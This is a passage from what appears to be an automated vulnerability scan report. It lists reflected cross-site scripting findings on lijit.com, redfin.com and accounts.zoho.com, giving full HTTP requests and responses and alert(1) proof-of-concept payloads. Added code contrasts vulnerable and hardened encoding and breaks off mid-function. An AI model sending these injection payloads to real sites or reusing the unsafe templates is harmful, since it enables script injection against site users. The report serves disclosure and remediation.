<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
scraperZoneId = -1;
var textAdZoneId = 51423;
var textAdBottomZoneId = 517352d599';alert(1)//6b07e0eccd4;
var skyCnt=0;

var textAdCnt=2 ;


var zone51423Delivered = false;


var zone517352d599';alert(1)//6b07e0eccd4Delivered = false;

var numSponsoredGoogleAds = 0;
var numSponsoredBottomGoogleAds = 0;
var numSkyGoogleAds = 0;

//deprecated for new zones
var numSponsoredLSAds = 0;
var numSkyLSAds = 0;
var
...[SNIP]...

1.26. http://www.lijit.com/delivery/serp [ztb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/serp

Issue detail

The value of the ztb request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 11c05'><script>alert(1)</script>4f6d59e9da6 was submitted in the ztb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=5173511c05'><script>alert(1)</script>4f6d59e9da6&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[785]=1; _OASCAP[785]=1; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:41:39 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n12), ms sea-ag1-n12 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:41:39 GMT
Age: 0
Content-Length: 15540
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
<script type='text/javascript' src='http://ap.lijit.com///www/delivery/ajs.php?zoneid=5173511c05'><script>alert(1)</script>4f6d59e9da6&username=buddytv&numAds=2 &serp=1&premium=1&engine=other&lijit_kw=xss xss cd fgytr ghjk&cb=1304125801&loc=http%3A%2F%2Fweb.15c.lijit.com%2Fdelivery%2Fserp%3Fu%3Dbuddytv%26zt%3D51423%26ztb%3D5173511c05
...[SNIP]...

1.27. http://www.lijit.com/delivery/serp [ztb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/serp

Issue detail

The value of the ztb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7775e%3balert(1)//7f9ffabc75e was submitted in the ztb parameter. This input was echoed as 7775e;alert(1)//7f9ffabc75e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=517357775e%3balert(1)//7f9ffabc75e&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[785]=1; _OASCAP[785]=1; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:41:45 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n7), ms sea-ag1-n7 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:41:45 GMT
Age: 0
Content-Length: 15401
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
ipt = true;
var canFireSkyNoAdsScript = true;
var textAdNoAdsZoneId = 28664;
var skyscraperNoAdsZoneId = 28673;
var skyscraperZoneId = -1;
var textAdZoneId = 51423;
var textAdBottomZoneId = 517357775e;alert(1)//7f9ffabc75e;
var skyCnt=0;

var textAdCnt=2 ;


var zone51423Delivered = false;


var zone517357775e;alert(1)//7f9ffabc75eDelivered = false;

var numSponsoredGoogleAds = 0;
var numSponsoredBottomGoo
...[SNIP]...

1.28. http://www.lijit.com/search [trackresize parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /search

Issue detail

The value of the trackresize request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7237"><script>alert(1)</script>006a39a9292 was submitted in the trackresize parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=truea7237"><script>alert(1)</script>006a39a9292&q=xss%20xss%20cd%20fgytr%20ghjk HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; tpro=eJyVUstuxCAM%2FBefUWpC3vce%2BwVthRAhCVICEWErVav8ew2rbnvNbWzNjMeYO%2BzBT3Y1MNxhNm40IaFNpQ4WlWAwmd%2Bqbk8Gas5cIXlJPQacUPtAnRRV4vWcgahl1acCWwY1yn29Hbnk5BGUziZa3TQMxFZTkGrLLuqwymW02GPPwMclxUJS6sWuYzAuqZ3Pw3oG3%2BbP2zrtt%2ByOUmBqpzQomwcmdoOSY65KykbwGa6q0gi%2FruaxpPMuLy7EvzYWDcnmoEZ56CXFItFhY8rwfs8IBngzo1UfL68umhCVdZtxEWi7SPsK3nUdlm19skv89hq%2Fv%2BYv8Jq%2FwO78fB6H%2Fky06d2faSsGmx%2Bl9jdSDg2DLxMO6%2Bl0wAuE8%2FwBFQm5yA%3D%3D; ljt_reader=9a524261efe1e1588396f48f16471b3c; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:40:38 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n12), ms sea-ag1-n12 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:40:38 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Lijit | Search - xss xss cd fgytr ghjk</title>
<meta
...[SNIP]...
<input type="hidden" name="trackresize" value="truea7237"><script>alert(1)</script>006a39a9292" />
...[SNIP]...

1.29. http://www.lijit.com/search [uri parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /search

Issue detail

The value of the uri request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1a78"><script>alert(1)</script>a5cc614c47e was submitted in the uri parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytvb1a78"><script>alert(1)</script>a5cc614c47e&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; tpro=eJyVUstuxCAM%2FBefUWpC3vce%2BwVthRAhCVICEWErVav8ew2rbnvNbWzNjMeYO%2BzBT3Y1MNxhNm40IaFNpQ4WlWAwmd%2Bqbk8Gas5cIXlJPQacUPtAnRRV4vWcgahl1acCWwY1yn29Hbnk5BGUziZa3TQMxFZTkGrLLuqwymW02GPPwMclxUJS6sWuYzAuqZ3Pw3oG3%2BbP2zrtt%2ByOUmBqpzQomwcmdoOSY65KykbwGa6q0gi%2FruaxpPMuLy7EvzYWDcnmoEZ56CXFItFhY8rwfs8IBngzo1UfL68umhCVdZtxEWi7SPsK3nUdlm19skv89hq%2Fv%2BYv8Jq%2FwO78fB6H%2Fky06d2faSsGmx%2Bl9jdSDg2DLxMO6%2Bl0wAuE8%2FwBFQm5yA%3D%3D; ljt_reader=9a524261efe1e1588396f48f16471b3c; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1

Response

HTTP/1.1 404 Not Found
Date: Mon, 17 Oct 2011 19:40:34 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n2), ms sea-ag1-n2 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Set-Cookie: user=deleted; expires=Sun, 17-Oct-2010 19:40:33 GMT; path=/; domain=.lijit.com
Set-Cookie: user=deleted; expires=Sun, 17-Oct-2010 19:40:33 GMT; path=/; domain=.lijit.com
Set-Cookie: kohanasession=qv6opjs2ebaj61mhis3be1c761; path=/; domain=.lijit.com
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJxdjZvcGpzMmViYWo2MW1oaXMzYmUxYzc2MSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e31sYXN0X2FjdGl2aXR5fGk6MTMxODg4MDQzNDs%3D; path=/; domain=.lijit.com
Content-Length: 10737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- Header -->
<head>
   <title>Lij
...[SNIP]...
<input type="hidden" name="destination" value="/search?unique_id=x8io6wpkPEIAAAohREkAAAB4&uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytvb1a78"><script>alert(1)</script>a5cc614c47e&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk" />
...[SNIP]...

1.30. http://www.lijit.com/search [view parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /search

Issue detail

The value of the view request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e6db"><script>alert(1)</script>20419c2b8de was submitted in the view parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained6e6db"><script>alert(1)</script>20419c2b8de&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; tpro=eJyVUstuxCAM%2FBefUWpC3vce%2BwVthRAhCVICEWErVav8ew2rbnvNbWzNjMeYO%2BzBT3Y1MNxhNm40IaFNpQ4WlWAwmd%2Bqbk8Gas5cIXlJPQacUPtAnRRV4vWcgahl1acCWwY1yn29Hbnk5BGUziZa3TQMxFZTkGrLLuqwymW02GPPwMclxUJS6sWuYzAuqZ3Pw3oG3%2BbP2zrtt%2ByOUmBqpzQomwcmdoOSY65KykbwGa6q0gi%2FruaxpPMuLy7EvzYWDcnmoEZ56CXFItFhY8rwfs8IBngzo1UfL68umhCVdZtxEWi7SPsK3nUdlm19skv89hq%2Fv%2BYv8Jq%2FwO78fB6H%2Fky06d2faSsGmx%2Bl9jdSDg2DLxMO6%2Bl0wAuE8%2FwBFQm5yA%3D%3D; ljt_reader=9a524261efe1e1588396f48f16471b3c; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:40:35 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n1), ms sea-ag1-n1 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:40:35 GMT
Age: 0
Content-Length: 15037
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Lijit | Search - xss xss cd fgytr ghjk</title>
<meta
...[SNIP]...
<input type="hidden" name="destination" value="/search?unique_id=x@HAxgpkPEkAAGSejoAAAAAt&uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained6e6db"><script>alert(1)</script>20419c2b8de&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk" />
...[SNIP]...

1.31. http://www.redfin.com/stingray/do/api-get-header-user-menu [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.redfin.com
Path:   /stingray/do/api-get-header-user-menu

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 14224<script>alert(1)</script>38404efc45 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stingray/do/api-get-header-user-menu?callback=dojo.io.script.jsonp_dojoIoScript1._jsonpCallback14224<script>alert(1)</script>38404efc45 HTTP/1.1
Host: www.redfin.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.redfin.com/about/redfin
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=222895640.1805584825.1318813956.1318813956.1318813956.1; __utmz=222895640.1318813956.1.1.utmcsr=madrona.com|utmccn=(referral)|utmcmd=referral|utmcct=/venture-capital-investments/portfolio-company.asp; __utmv=222895640.none; JSESSIONID=AC659812AD80234CB7866DE3059A8897

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:38:51 GMT
Server: Apache-Coyote/1.1
X-UA-Compatible: IE=7;FF=2;chrome=1
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Set-Cookie: RF_LAST_ACCESS=""; Domain=.redfin.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: RF_AUTH=""; Domain=.redfin.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 261
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive

dojo.io.script.jsonp_dojoIoScript1._jsonpCallback14224<script>alert(1)</script>38404efc45({}&&{"errorMessage":"Success","resultCode":0,"payload":{"data":{"userPhotoUrl":"http://img.cdn-redfin.com/v6.5.10/images/myredfin/photo/default-25x25.png"}},"version":15})
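As an added illustration (not Redfin's code and not part of the scanner output), the following Node.js snippet reproduces the unfiltered JSONP rendering seen in the response above and contrasts it with a callback allow-list. The callback string, the legitimate dojo.io.script callback name and the JSON body are copied from the request and response; the function names, the identifier regular expression, the 128-character length cap, the leading /**/ prefix and the header set are this example's own choices, not Redfin's implementation.

```javascript
// Added example (not Redfin's code): JSONP rendering from item 1.31, unfiltered
// as in the captured response, and a hardened version that accepts only a
// dotted chain of JavaScript identifiers as the callback name.
// The callback string and JSON body are copied from the report; function names,
// the regular expression, the length cap and the /**/ prefix are assumptions.

const PAYLOAD_CALLBACK =
  'dojo.io.script.jsonp_dojoIoScript1._jsonpCallback14224<script>alert(1)</script>38404efc45';
const LEGIT_CALLBACK = 'dojo.io.script.jsonp_dojoIoScript1._jsonpCallback14224';

const RESULT = {
  errorMessage: 'Success',
  resultCode: 0,
  payload: { data: { userPhotoUrl: 'http://img.cdn-redfin.com/v6.5.10/images/myredfin/photo/default-25x25.png' } },
  version: 15,
};

// Vulnerable: the callback name is concatenated into the body unmodified,
// reproducing the "{}&&" wrapper seen in the captured response.
function renderJsonpUnsafe(callback, result) {
  return callback + '({}&&' + JSON.stringify(result) + ')';
}

// Allow-list: identifier(.identifier)*, ASCII only, bounded length.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;
function isValidCallback(name) {
  return typeof name === 'string' && name.length <= 128 && CALLBACK_RE.test(name);
}

// Hardened: reject anything that is not a plain identifier chain and start the
// body with a fixed comment so the first bytes are never attacker-controlled.
function renderJsonpSafe(callback, result) {
  if (!isValidCallback(callback)) {
    throw new Error('invalid JSONP callback name');
  }
  return '/**/' + callback + '(' + JSON.stringify(result) + ');';
}

// Headers to send with the hardened body: a script content type, and nosniff
// so a browser never reinterprets the response as HTML.
function jsonpHeaders() {
  return {
    'Content-Type': 'application/javascript; charset=UTF-8',
    'X-Content-Type-Options': 'nosniff',
    'Cache-Control': 'no-store',
  };
}

console.log(renderJsonpUnsafe(PAYLOAD_CALLBACK, RESULT));
console.log(renderJsonpSafe(LEGIT_CALLBACK, RESULT));
```

The first console.log line is byte-for-byte the body captured above; the second is what the same request would produce once the callback name is validated. Validation by allow-list is the point: trying to strip or encode "<" and ">" out of the callback leaves every other way of breaking a script body unaddressed.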

1.32. https://accounts.zoho.com/register [iamcsr cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.zoho.com
Path:   /register

Issue detail

The value of the iamcsr cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 138b3'-alert(1)-'219955ac53 was submitted in the iamcsr cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability, for example a cookie-injection or header-injection flaw on any other host under the same parent domain, since a cookie set with Domain=.zoho.com is sent to accounts.zoho.com as well. This limitation considerably mitigates the impact of the vulnerability. Note that the reflected value is emitted as csrfParam, so the same cookie appears to carry the anti-CSRF token; an attacker who can plant the cookie controls that token too, which is worth checking before the finding is dismissed.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context, for example by placing the value in an attribute-encoded data attribute or hidden input and reading it from the DOM. Where it must be emitted inside a script block, encode it for the JavaScript string context specifically (backslash or \uXXXX escapes for quotes, backslashes, <, > and the U+2028/U+2029 line terminators); HTML entity encoding is the wrong tool here, because the browser does not decode entities inside a script block. As the response shows, a single-quoted literal is broken by one unescaped ' character.

Request

GET /register?servicename=ZohoCRM&showheader=false&serviceurl=https%3A%2F%2Fzoho.com%2Fcrm%2Flp%2Fsignup-redirect.html&showGoogleYahoo=false&css=https://www.zoho.com/crm/theme/signup2.css HTTP/1.1
Host: accounts.zoho.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://accounts.zoho.com/register?servicename=ZohoCRM&showheader=false&serviceurl=https%3A%2F%2Fzoho.com%2Fcrm%2Flp%2Fsignup-redirect.html&showGoogleYahoo=false&css=https://www.zoho.com/crm/theme/signup2.css
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1546431367.1318880860.1318880860.1318880860.1; __utmb=1.2.9.1318880868281; __utmc=1; __utmz=1.1318880860.1.1.utmcsr=getapp.com|utmccn=(referral)|utmcmd=referral|utmcct=/gaxc.php; iamcsr=e67359a3-5322-4685-882f-9bfdccdbe9fd138b3'-alert(1)-'219955ac53; rtk=1318880967696; JSESSIONID=8959335B59D44587CD2A8429CAA2E510; acctsze=0

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 17 Oct 2011 19:50:41 GMT
Server: ZWS
Strict-Transport-Security: max-age=604800
Content-Length: 37553


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
   <title>Create New Account</title>

<script
...[SNIP]...
var servicename ='ZohoCRM';
var partner_domain = 'null';
var blockedEmailDomain = '@zoho.com';
var csrfParam = 'iamcsrcoo=e67359a3-5322-4685-882f-9bfdccdbe9fd138b3'-alert(1)-'219955ac53';

function de(id) {
return document.getElementById(id);
}

function validateUserName(lid) {
if(lid.trim() == "") {

...[SNIP]...
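Added example, not Zoho's or Lijit's code: the two reflection contexts in this report, a single-quoted JavaScript string (1.32, the csrfParam line above) and a double-quoted HTML attribute (1.30, the hidden destination input), rebuilt in Node.js with and without context-aware encoding. The payloads are copied from the report and the template shapes mirror the response snippets; the function names and the evaluate() harness, which stubs alert so calls can be counted, are assumptions of this example.

```javascript
// Added example (not the vendors' code): reflected values in a JS string and in
// an HTML attribute, vulnerable and hardened. Payloads are copied from items
// 1.32 and 1.30 of the report; everything else is this example's own choice.

const COOKIE_PAYLOAD = "e67359a3-5322-4685-882f-9bfdccdbe9fd138b3'-alert(1)-'219955ac53";
const VIEW_PAYLOAD = 'contained6e6db"><script>alert(1)</script>20419c2b8de';

// --- JavaScript string context (item 1.32) ---

// Vulnerable: concatenation into a single-quoted literal, as in the response.
function scriptVarUnsafe(value) {
  return "var csrfParam = 'iamcsrcoo=" + value + "';";
}

// Hardened: emit the value as a JSON string literal, then escape the characters
// JSON leaves alone that can still end an inline <script> or a JS line.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')       // prevents a literal "</script>"
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')  // JS line terminators not escaped by JSON
    .replace(/\u2029/g, '\\u2029');
}
function scriptVarSafe(value) {
  return 'var csrfParam = ' + jsStringLiteral('iamcsrcoo=' + value) + ';';
}

// Test harness (assumption): run the emitted script with alert stubbed and
// report the resulting csrfParam plus every alert() call that happened.
function evaluate(js) {
  const alertCalls = [];
  const fakeAlert = (x) => { alertCalls.push(x); return 0; };
  const run = new Function('alert', js + '\nreturn csrfParam;');
  return { csrfParam: run(fakeAlert), alertCalls };
}

// --- HTML attribute context (item 1.30) ---

function htmlAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Vulnerable: the decoded query value lands inside a double-quoted attribute.
function destinationInputUnsafe(view) {
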